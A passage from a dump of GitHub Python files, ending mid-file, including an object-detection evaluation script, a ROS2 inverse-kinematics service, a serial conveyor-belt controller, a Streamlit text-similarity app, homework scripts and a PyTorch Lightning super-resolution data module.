'Box2D_pred': [pred_result[pred_key][\"bbx\"]],\n 'Box2D_truth': [truth_box],\n 'Pred_result': [\"TP\"],\n 'Duplicate?': [False],\n 'Distance': [img_log[best_key][\"label\"][\"distance\"]]\n }\n pred_per_key[best_key] += 1\n else:\n # save as FP\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [None],\n 'Yolo_class_pred': [pred_result[pred_key][\"class\"]],\n 'Conf': [pred_result[pred_key][\"conf\"]],\n 'Object_name': [None],\n 'Box2D_pred': [pred_result[pred_key][\"bbx\"]],\n 'Box2D_truth': [None],\n 'Pred_result': [\"FP\"],\n 'Duplicate?': [False],\n 'Distance': [None]\n }\n new_img_row = pl.DataFrame(new_img_row_data, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n df = df.extend(new_img_row)\n for count_key in pred_per_key.keys():\n if pred_per_key[count_key] == 0:\n # save as FN\n truth_box = [img_log[count_key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[count_key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[count_key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[count_key][\"label\"][\"box2D\"][\"y_min\"]]\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [img_log[count_key][\"label\"][\"yolo_class\"]],\n 'Yolo_class_pred': [None],\n 'Conf': [None],\n 'Object_name': [img_log[count_key][\"label\"][\"name\"]],\n 'Box2D_pred': [None],\n 'Box2D_truth': [truth_box],\n 'Pred_result': [\"FN\"],\n 'Duplicate?': [False],\n 'Distance': [img_log[count_key][\"label\"][\"distance\"]]\n }\n new_img_row = pl.DataFrame(new_img_row_data, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n df = df.extend(new_img_row)\n elif pred_per_key[count_key] > 1:\n # duplicate pred ?\n conditions = (df[\"Img_path\"] == str(img_path)) & (df[\"Pred_result\"] == \"TP\") & (\n df[\"Object_name\"] == img_log[count_key][\"label\"][\"name\"])\n df = df.with_columns(pl.when(conditions).then(True).otherwise(df['Duplicate?']).alias('Duplicate?'))\n return df\n\n\ndef create_evaluation_df(data_path, reformed_results, log_path, conf, save_flag):\n \"\"\"\n Creates the evaluation dataframe\n Parameters\n ----------\n data_path, Path :\n Path of the data\n reformed_results, Dict :\n Reformed_result dict\n log_path, Path :\n Path of the log data file\n conf, float :\n confidence threshold\n save_flag, bool :\n flag to save the df into a json\n\n Returns\n -------\n\n \"\"\"\n\n data_dict = {\n 'Img_path': [],\n 'Weather_param': [],\n 'Weather_value': [],\n 'Level': [],\n 'Timeoftheday': [],\n 'Yolo_class_truth': [],\n 'Yolo_class_pred': [],\n 'Conf': [],\n 'Object_name': [],\n 'Box2D_pred': [],\n 'Box2D_truth': [],\n 'Pred_result': [],\n 'Duplicate?': [],\n 'Distance': []\n }\n df = pl.DataFrame(data_dict, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n for img_path in tqdm(data_path.iterdir()):\n img_log = get_img_log(img_path.stem, log_path)\n df = add_to_df2(df, img_log, reformed_results[img_path.stem], img_path, conf)\n if save_flag:\n df.write_json(file=str(data_path.parent / 'test_data.json'), row_oriented=True, pretty=True)\n return df\n\n\ndef good_split_slice(number):\n \"\"\"\n Split a number into the highest decomposition where a x b = number\n Parameters\n ----------\n number, int :\n Number you want to split in 2\n\n Returns a,b, int :\n highest decompostion number\n -------\n\n \"\"\"\n if number == 1:\n return 1, 1\n a = int(number ** 0.5)\n while a > 0:\n if number % a == 0:\n b = number // a\n if a == 1:\n raise ValueError(\"The number of slice cannot be divided properly change the number of slice\")\n else:\n return a, b\n a -= 1\n\n\ndef generate_graph(df, graphdict):\n \"\"\"\n Generate graph with parameters depending on graphdict\n Parameters\n ----------\n json_path, Path :\n Path of the dataframe json\n graphdict, dic :\n dict containing x and y field for the graph\n\n Returns\n -------\n\n \"\"\"\n colors = ['red', 'blue', 'green', 'yellow', 'orange', 'purple', 'cyan', 'magenta', 'pink', 'brown']\n bar_width = 0.2\n for dict_axis in graphdict:\n\n unique_val_x = df[dict_axis[\"x\"]].unique().to_list()\n unique_val_y = df[dict_axis[\"y\"]].unique().to_list()\n\n dict_val = {}\n if dict_axis[\"y\"] == \"Distance\":\n unique_val_y = [item for item in unique_val_y if item is not None]\n quotient = (round((max(unique_val_y) / 500)))\n max_range = quotient * 500\n list_axis = np.linspace(0, max_range, quotient + 1)\n unique_val_y = []\n for i in range(1, len(list_axis)):\n unique_val_y.append(str(int(list_axis[i - 1])) + \"_\" + str(int(list_axis[i])))\n for x_val in unique_val_x:\n dict_val[x_val] = []\n for y_val in unique_val_y:\n lower_range, higher_range = y_val.split(\"_\")\n dict_val[x_val].append(df.filter(\n (pl.col(dict_axis[\"y\"]) > int(lower_range)) & (pl.col(dict_axis[\"y\"]) <= int(higher_range)) & (\n pl.col(dict_axis[\"x\"]) == x_val)).shape[0])\n else:\n for x_val in unique_val_x:\n dict_val[x_val] = []\n for y_val in unique_val_y:\n dict_val[x_val].append(\n df.filter((pl.col(dict_axis[\"y\"]) == y_val) & (pl.col(dict_axis[\"x\"]) == x_val)).shape[0])\n index = np.arange(len(unique_val_y))\n\n counter = 0\n print(sorted(dict_val.keys()))\n for i in sorted(dict_val.keys()):\n\n plt.bar(index + counter * bar_width, dict_val[i], bar_width, label=i, color=colors[counter])\n counter += 1\n if counter == 10:\n raise ValueError(\"More than 10 different parameter isn't supported for more readable plot\")\n plt.xlabel('Parameters')\n plt.ylabel('Count')\n plt.title(dict_axis[\"y\"] + \" over \" + dict_axis[\"x\"])\n plt.xticks(index + bar_width, unique_val_y)\n\n plt.legend()\n plt.show()\n\n\ndef evaluate_model(weigth_path, img_path, log_path, model_type, IoU_threshold, slice_size, overlap, conf, device = \"cuda:0\", save = True):\n \"\"\"\n Run inference on some image and generate a polars Dataframe (possibility to save it thanks to save flag)\n Parameters\n ----------\n weigth_path, Path :\n Path of the .pt file\n img_path, Path :\n Path of the img directory\n log_path, Path :\n Path of the log file\n model_type, \"Yolov8\" or \"SAHI\" :\n Type of inference for predict\n IoU_threshold, float :\n Value of the IoU threshold to consider a prediction TP\n slice_size, list[int,int] :\n Size of a slice (whithout overlap)\n overlap, list[float,float] :\n Percentage of the overlap for a slice\n conf, float :\n Confidence Threshold for valid guess\n device, str :\n Name of the device used for the inference\n save, bool :\n Flag to save the polars dataframe\n\n Returns\n -------\n\n \"\"\"\n list_img = list(img_path.iterdir())\n if model_type == \"SAHI\":\n result = predict_sahi(weigth_path,list_img,slice_size,\n overlap,conf,device)\n elif model_type == \"Yolov8\":\n model = YOLO(str(weigth_path))\n result = {}\n for i in tqdm(list_img):\n result[i.stem] = model.predict(str(i))[0]\n else :\n raise ValueError(\"Model Type not recognize, use \\\"Yolov8\\\" or \\\"SAHI\\\"\")\n reformed_result = {}\n for i in result.keys():\n reformed_result[i] = reformat_predict(result[i])\n eval_df = create_evaluation_df(img_path, reformed_result, log_path, IoU_threshold, save)\n return eval_df\n","repo_name":"Alcharyx/IRP-Eye-out","sub_path":"src/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":19837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16350596043","text":"import asyncio\nimport logging\n\nimport aiohttp\n\nimport sql\nfrom pipeline import TrainingData, Scoring, Actuals, StationDataImporter, TripDataImporter\nfrom pathlib import Path\nimport zipfile\nlogger = logging.getLogger(__name__)\n\n\ndef export_training_data():\n TrainingData().process()\n\n\nasync def import_data():\n await StationDataImporter().run()\n\n with zipfile.ZipFile('./data/data.zip', 'r') as file:\n file.extractall('./data')\n\n for path in sorted(Path('./data').iterdir()):\n if not path.name.endswith('.csv'):\n continue\n await TripDataImporter(path).run()\n path.unlink()\n\n\nasync def score():\n async with aiohttp.ClientSession() as session:\n scoring = Scoring(session)\n while True:\n try:\n await scoring.predict()\n await asyncio.sleep(10)\n except Exception as e:\n logger.error(e)\n await asyncio.sleep(100)\n\n\nasync def actual_submit():\n async with aiohttp.ClientSession() as session:\n actuals = Actuals(session)\n while True:\n try:\n await actuals.upload()\n await asyncio.sleep(600)\n except Exception as e:\n logger.error(e)\n await asyncio.sleep(100)\n\n\nif __name__ == '__main__':\n # initialization\n sql.create_database()\n sql.create_tables()\n\n # configure logger\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n\n # start run loop\n loop = asyncio.get_event_loop()\n loop.create_task(import_data())\n loop.run_forever()\n loop.close()\n","repo_name":"automactic/BlueBike","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7291117267","text":"from tutorial_interfaces.srv import FirstService\n\nimport rclpy\nfrom rclpy.node import Node\n\nimport numpy as np\n\n\nclass MinimalService(Node):\n\n def __init__(self):\n super().__init__('minimal_service')\n self.srv = self.create_service(FirstService, 'inverse', self.service_callback)\n\n def service_callback(self, request, response):\n #response.sum = request.a + request.b\n \n x=request.x\n y=request.y\n z= request.z\n \n \n l1=2.0\n l2=1.0\n l3=1.0\n \n Q3=l1-z\n \n n=(x**2+y**2-l2**2-l3**2)\n d=2*l2*l3\n \n Q2=np.arccos(n/d)\n \n \n n_1=(l2+l3*np.cos(Q2))*x +(l3*np.sin(Q2)*y)\n d_1=(l2+l3*np.cos(Q2))**2+(l3*np.sin(Q2))**2\n \n Q1=np.arccos(n_1/d_1)\n \n self.get_logger().info('The Joint values are Q1: %f Q2: %f and Q3:%f' % (Q1,Q2,Q3))\n \n response.q1=Q1\n response.q2=Q2\n response.q3=Q3\n\n return response\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n minimal_service = MinimalService()\n\n rclpy.spin(minimal_service)\n\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"swagholikar29/RBE500-Projects","sub_path":"Project_1/src/inverse_kinematics/inverse_kinematics/service_member_function.py","file_name":"service_member_function.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12672704369","text":"import unittest\nimport pandas as pd\n\nfrom monitoring_service.stat_tests import ks_test, chi_square_test, bayesian_a_b_test\n\n\ndef test_ks_test():\n ref = pd.DataFrame({\"a\": [10.5, 16, 11.1]})\n cur = pd.DataFrame({\"a\": [21, 33, 22.2]})\n p = ks_test(reference_data=ref['a'], current_data=cur['a'], resample=True)\n assert round(p, 1) == 0.1\n\n\ndef test_chi_square_test():\n ref = pd.DataFrame({\"a\": [10, 16, 11]})\n cur = pd.DataFrame({\"a\": [20, 32, 22]})\n p = chi_square_test(reference_data=ref['a'], current_data=cur['a'], resample=True)\n assert p == 0.0\n\n\ndef test_bayesian_a_b_test():\n ref = pd.DataFrame({\"a\": [10.5, 16, 11.1]})\n cur = pd.DataFrame({\"a\": [21, 33, 22.2]})\n p = bayesian_a_b_test(a_array=ref['a'], b_array=cur['a'])\n assert round(p, 1) == 0.5\n","repo_name":"nlinc1905/drift-monitoring","sub_path":"tests/test_stat_tests.py","file_name":"test_stat_tests.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36838507663","text":"# Author: Gabriel Dinse\n# File: conveyor_belt_controller\n# Date: 21/05/2019\n# Made with PyCharm\n\n# Standard Library\n\n# Third party modules\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\n\n# Local application imports\n\n\nclass ConveyorController(QSerialPort):\n \"\"\"\n Classe responsavel pela comunicacao serial com o arduino, bem como pelo\n envio dos comandos de ligar e desligar a esteira.\n \"\"\"\n def __init__(self, debug=False, vendor_id=6790, product_id=29987,\n start_command=b'(A)', stop_command=b'(S)'):\n super().__init__()\n self.vendor_id = vendor_id\n self.product_id = product_id\n self.start_command = start_command\n self.stop_command = stop_command\n self.available_to_use = False\n self.online = False\n self.running = False\n self.debug = debug\n\n if self.debug:\n print('\\n- - - - - - - - - - - - - - - - - - - - - - - - - - -')\n print('Numero de portas seriais conectadas ao PC: {}'.format(\n len(QSerialPortInfo().availablePorts())))\n\n for port_info in QSerialPortInfo().availablePorts():\n if (port_info.hasVendorIdentifier() and\n port_info.hasProductIdentifier()):\n if (port_info.vendorIdentifier() == vendor_id and\n port_info.productIdentifier() == product_id):\n self.port_name = port_info.portName()\n self.available_to_use = True\n\n if self.available_to_use:\n if self.debug:\n print('Dispositivo de controle da esteira encontrado'\n ' com sucesso!')\n self.setPortName(self.port_name)\n self.setBaudRate(QSerialPort.Baud9600, QSerialPort.AllDirections)\n self.setDataBits(QSerialPort.Data8)\n self.setParity(QSerialPort.NoParity)\n self.setStopBits(QSerialPort.OneStop)\n self.setFlowControl(QSerialPort.NoFlowControl)\n\n # Apos todas as configuracoes tenta conectar com a porta serial\n if self.open(QSerialPort.ReadWrite):\n if self.debug:\n print('Comunicacao estabelecida com sucesso!')\n self.online = True\n else:\n if self.debug:\n print('Erro: nao foi possivel estabelecer a comunicacao'\n ' com o dispositivo de controle da esteira.')\n else:\n if self.debug:\n print('Aviso: dispositivo de controle da esteira '\n 'nao encontrado.')\n print('- - - - - - - - - - - - - - - - - - - - - - - - - - -\\n')\n\n def start(self):\n \"\"\" Envia o comando de ligar. \"\"\"\n if self.isWritable():\n if self.debug:\n print('Comando: Ligar esteira')\n self.write(self.start_command)\n self.running = True\n\n def stop(self):\n \"\"\" Envia o comando de desligar. \"\"\"\n if self.isWritable():\n if self.debug:\n print('Comando: Desligar esteira')\n self.write(self.stop_command)\n self.running = False\n","repo_name":"gabrieldinse/oranges_identifier","sub_path":"conveyor_belt_controller.py","file_name":"conveyor_belt_controller.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2157085483","text":"import requests, sys\nurl='https://justinjackson.ca/words.html'\nresponse = requests.get(url)\nnum_word=0\nif response.status_code != 200:\n print(f\"cannot connect to url{url}\")\n sys.exit(1)\nres=response.text.split('\\n')\nfor line in res:\n line = line.strip()\n if not line.startswith('<'):\n for word in line:\n word=word.strip()\n if not word.startswith('<'):\n num_word=num_word+1\n print(line)\nprint(f\"{num_word} is number of words in the page not including the headers\")","repo_name":"Farreeda/Fareeda-SavageCamp","sub_path":"requestex.py","file_name":"requestex.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39000075932","text":"# 03 - Python Homework\n# PyBank\n\n# import modules \nimport os\nimport csv\n\n# list used to store data\nmonths = []\nprofit_losses = []\nprofit_var = []\n# placeholder to keep tally of profit while performing arithmetic\nprofit_tally = 0\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\n# open file and set to read w/ commas separatein\nwith open(csvpath, newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n csv_header = next(csvreader) \n# show file opject to be read\n print(csvreader)\n\n # populate the months list with data from 1st column (skip header)\n # find length of months list\n for row in csvreader:\n \n months.append(row[0])\n length = len(months)\n\n #print(\"Total Months: \" + str(length))\n\n# Find the total profit\n \nwith open(csvpath, newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n csv_header = next(csvreader)\n \n # populate the profit/losses list with column 2 data (skip header) \n for row in csvreader:\n profit_losses.append(int(row[1]))\n \n # add the numbers in the list w/ the sum function\n profit_tally = (sum(profit_losses))\n \n #create list of the diffferences between values in profit/losses list\n\n profit_var = [profit_losses[i+1]-profit_losses[i]\n for i in range(len(profit_losses)-1)]\n \n # calculate the average of the list of differences\n # and assign to new variable: avg_profit_var.\n avg_profit_var = round(sum(profit_var) / len(profit_var), 2)\n \n\n # find the greatest increase in profits (date and amount) over the entire period\n # and assign to variable: max_profit_var.\n max_profit_var = max(profit_var)\n # find index of the biggest increase in profit variance list &\n # find the month at that index in months list\n best_month = months[profit_var.index(max_profit_var)]\n #print(best_month)\n\n \n # find the greatest decrease in profits (date and amount) over the entire period\n # and assign to variable: min_profit_var.\n min_profit_var = min(profit_var)\n # find index of the biggest decrease in profit variance list &\n # find the month at that index in months list\n worst_month = months[profit_var.index(min_profit_var)]\n \n# Print out report\nprint(\"Financial Analysis\")\nprint(\"****************************************\") \nprint(\"Total Months: \" + str(length))\nprint(\"Total Profit: $\", str(profit_tally)) \nprint(\"Average Change: $\", str(avg_profit_var))\nprint(\"Largest Increase in Profits: $\", str(max_profit_var), best_month)\nprint(\"Largest Decrease in Profits: $\", str(min_profit_var), worst_month)\n\n# Specify the file to write to\noutput_path = os.path.join(\"output\", \"new.txt\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w') as txtfile:\n\n txtfile.write(\"Financial Analysis\")\n txtfile.write(\"****************************************\") \n txtfile.write(\"Total Months: \" + str(length))\n txtfile.write(\"Total Profit: $\" + str(profit_tally)) \n txtfile.write(\"Average Change: $\" + str(avg_profit_var))\n txtfile.write(\"Largest Increase in Profits: $\" + str(max_profit_var) + best_month)\n txtfile.write(\"Largest Decrease in Profits: $\" + str(min_profit_var) + worst_month)\n\n\n\n\n\n\n","repo_name":"mpatterson73/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36852387961","text":"#Finds words that are in input file\r\ndef wordFind(inputfile,found): \r\n with open(inputfile,'r') as file: #open file to be read\r\n linenum=1;\r\n foundnum=0;\r\n # read each line \r\n for line in file: \r\n # read each word \r\n for word in line.split(): #for words in line\r\n # display the result \r\n if(word == found): #match the word with user entered word.\r\n print(word,\" was found on line \",linenum)\r\n foundnum+=1\r\n linenum+=1 \r\n if(foundnum == 0):\r\n print(found,\" was not found\")\r\n\r\n#main \r\nif __name__ == \"__main__\":\r\n inputfile = str(input(\"Enter File Name: \"))\r\n found = str(input(\"Enter name to be Searched in File: \"))\r\n wordFind(inputfile,found)#call function","repo_name":"asiamak/Project-3-2","sub_path":"wordfind.py","file_name":"wordfind.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31134147358","text":"# bfs\n\nfrom collections import deque\n\n# 상하좌우\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef bfs(r, c, maps):\n queue = deque([])\n queue.append([r, c])\n visited = [[0] * len(maps[0]) for i in range(len(maps))]\n visited[r][c] = 1\n\n # 큐에서 꺼내옴\n while queue:\n x, y = queue.popleft()\n\n # 목적지 인가\n if x == (len(maps)-1) and y == (len(maps[0])-1):\n return visited[len(maps)-1][len(maps[0])-1]\n\n # 갈 수 있는곳 순회\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n # 갈 수 있는가\n if 0 <= nx < len(maps) and 0 <= ny < len(maps[0]):\n if maps[nx][ny]==1:\n if visited[nx][ny] == 0:\n queue.append([nx, ny]) # 큐에 넣기\n visited[nx][ny] = visited[x][y]+1 # 체크인\n\n return -1\n\n\ndef solution(maps):\n answer = 0\n\n answer=bfs(0, 0, maps)\n\n return answer\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]]))","repo_name":"SangRakee/AlgoriGym","sub_path":"Programmers/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40634487652","text":"\nimport numpy as np\nimport pandas as pd\nimport re\nimport string\nimport nltk \nfrom nltk.stem import WordNetLemmatizer \nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.pipeline import Pipeline\nimport spacy\nfrom collections import Counter\nimport pickle\nimport streamlit as st\nnlp = spacy.load('en_core_web_sm')\n\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('omw-1.4')\nnltk.download('punkt')\n\n\n\nst.header('SEMANTIC TEXTUAL SIMILARITY')\ntext1 = pickle.load(open('text1.pkl','rb'))\ntext2 = pickle.load(open('text2.pkl','rb'))\n\nselected_text1 = st.selectbox(\n \"select a text from the dropdown\",\n text1)\n\nselected_text2 = st.selectbox(\n \"select a text from the dropdown\",\n text2)\n\ncopydata = pd.DataFrame([[selected_text1,selected_text2]],columns = [\"text1\",\"text2\"])\n\ndef remove_punc(copydata):\n pattern = r'[' + string.punctuation + ']'\n copydata['text1']=copydata['text1'].map(lambda m:re.sub(pattern,\" \",m))\n copydata['text2']=copydata['text2'].map(lambda m:re.sub(pattern,\" \",m))\n return copydata\n\n\ndef lower(copydata):\n copydata['text1']=copydata['text1'].map(lambda m:m.lower())\n copydata['text2']=copydata['text2'].map(lambda m:m.lower())\n return copydata\n\n\ndef tokenization(text):\n tokens = re.split(' ',text)\n return tokens\n\ndef token(copydata):\n copydata['text1']= copydata['text1'].apply(lambda x: tokenization(x))\n copydata['text2']= copydata['text2'].apply(lambda x: tokenization(x))\n return copydata\n\n\nsw=nltk.corpus.stopwords.words('english')\n\ndef remove_SW(copydata):\n copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if item not in sw])\n copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if item not in sw])\n return copydata\n\n\ndef remove_digits(copydata):\n copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if not item.isdigit()])\n copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if not item.isdigit()])\n return copydata\n\n\nlemmatizer = WordNetLemmatizer()\n\ndef lemmatize(copydata):\n copydata['text1']=copydata['text1'].apply(lambda x: [lemmatizer.lemmatize(item) for item in x])\n copydata['text2']=copydata['text2'].apply(lambda x: [lemmatizer.lemmatize(item) for item in x])\n return copydata\n\n\ndef remove_empty_tokens(copydata):\n copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if item !=''])\n copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if item !=''])\n return copydata\n\n\ndef remove_single_letters(copydata):\n copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if len(item) > 1])\n copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if len(item) > 1])\n return copydata\n\n\ndef detoken(copydata):\n copydata['text1']= copydata['text1'].apply(lambda x: TreebankWordDetokenizer().detokenize(x))\n copydata['text2']= copydata['text2'].apply(lambda x: TreebankWordDetokenizer().detokenize(x))\n return copydata\n\ndef replace_spaces(x,space,second):\n result = x.replace(space, second)\n return result\ndef remove_space(copydata):\n copydata['text1']= copydata['text1'].apply(lambda x: replace_spaces(x,' ',' '))\n copydata['text2']= copydata['text2'].apply(lambda x: replace_spaces(x,' ',' '))\n return copydata\n\ndef count_vcr():\n for i in range(len(copydata)):\n doc1=copydata['text1'][i]\n doc2=copydata['text2'][i]\n docs=(doc1,doc2)\n matrix = CountVectorizer().fit_transform(docs)\n cosine_sim = cosine_similarity(matrix[0], matrix[1])\n similarity.append(cosine_sim)\n return similarity\n\ncopydata=copydata.pipe(remove_punc).pipe(token).pipe(remove_SW).pipe(remove_digits).pipe(lemmatize).pipe(remove_empty_tokens).pipe(remove_single_letters)\n\nsimilarity=[]\ndef get_similarity():\n bow_converter = CountVectorizer()\n copydata.pipe(detoken).pipe(remove_space)\n\n similarity=count_vcr()\n data_cvr=copydata.copy()\n data_cvr['Similarity']=similarity\n return data_cvr\n\n\nif st.button('Show Similarity'):\n data_cvr = get_similarity()\n st.text(data_cvr.iloc[0,0])\n st.text(data_cvr.iloc[0,1])\n st.text(data_cvr.iloc[0,2])\n","repo_name":"Nickghase/Semantic-Textual-Similarity","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71175052648","text":"import os\ntry:\n import nni\n from nni.utils import merge_parameter\nexcept ImportError:\n pass\nimport numpy\nimport math\nimport h5py\nimport argparse\nimport time\nimport datetime\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping, Callback\nimport mlflow.pytorch\nmlflow.set_tracking_uri(\"sqlite:///mlruns.db\")\n\nclass SRDataset(Dataset):\n def __init__(self, data_path, args, transform=None):\n '''\n data: image\n transform: optional transforms applied to the image\n '''\n start_time = time.time()\n print(f'read images {data_path} ...')\n # read data\n h5_file = h5py.File(data_path, 'r')\n if args.debug:\n self.X = h5_file['X'][:10]\n self.y = h5_file['y'][:10]\n else:\n self.X = h5_file['X'][:]\n self.y = h5_file['y'][:]\n self.transform = transform\n print(f'loading images took {start_time - time.time():.4f}sec')\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, idx):\n x = self.X[idx]\n y = self.y[idx]\n if self.transform:\n x = self.transform(x)\n y = self.transform(y)\n\n return x, y\n\n\nclass AddGaussianNoise(object):\n def __init__(self, mean=0., std=1.):\n self.std = std\n self.mean = mean\n \n def __call__(self, tensor):\n return tensor + torch.randn(tensor.size()) * self.std + self.mean\n \n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass SRDataModule(pl.LightningDataModule):\n def __init__(self, args):\n super().__init__()\n self.train_transform = transforms.Compose([#transforms.RandomHorizontalFlip(),\n #transforms.RandomVerticalFlip(),\n #transforms.RandomInvert(),\n #transforms.ColorJitter(),\n #transforms.RandomGrayscale(),\n transforms.ToTensor(),\n #transforms.RandomRotation(90),\n #transforms.RandomRotation(180),\n #transforms.RandomRotation(270),\n #AddGaussianNoise(0.1, 0.08),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\n self.val_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\n\n def setup(self, stage):\n if stage == 'fit' or stage is None:\n sr_train = os.path.join(args.data_dir, 'train.h5')\n sr_valid = os.path.join(args.data_dir, 'valid.h5')\n\n self.train_dataset = SRDataset(sr_train, args, transform=self.train_transform)\n self.valid_dataset = SRDataset(sr_valid, args, transform=self.val_transform)\n\n def train_dataloader(self):\n train_dataloader = DataLoader(self.train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True)\n print(f'train_dataloader: {next(iter(train_dataloader))[0].shape}')\n print(f'train_dataloader: {next(iter(train_dataloader))[1].shape}')\n return train_dataloader\n\n def val_dataloader(self):\n val_dataloader = DataLoader(self.valid_dataset, batch_size=args.batch_size)\n print(f'val_dataloader: {next(iter(val_dataloader))[0].shape}')\n print(f'val_dataloader: {next(iter(val_dataloader))[1].shape}')\n return val_dataloader\n\nclass ConvolutionalBlock(pl.LightningModule):\n '''\n Convolutional block: Convolution, BatchNorm, Activation\n credits: https://github.com/sgrvinod/a-PyTorch-Tutorial-to-Super-Resolution/blob/master/models.py\n '''\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, batch_norm=False, activation=None):\n '''\n :param in_channels: number of input channels\n :param 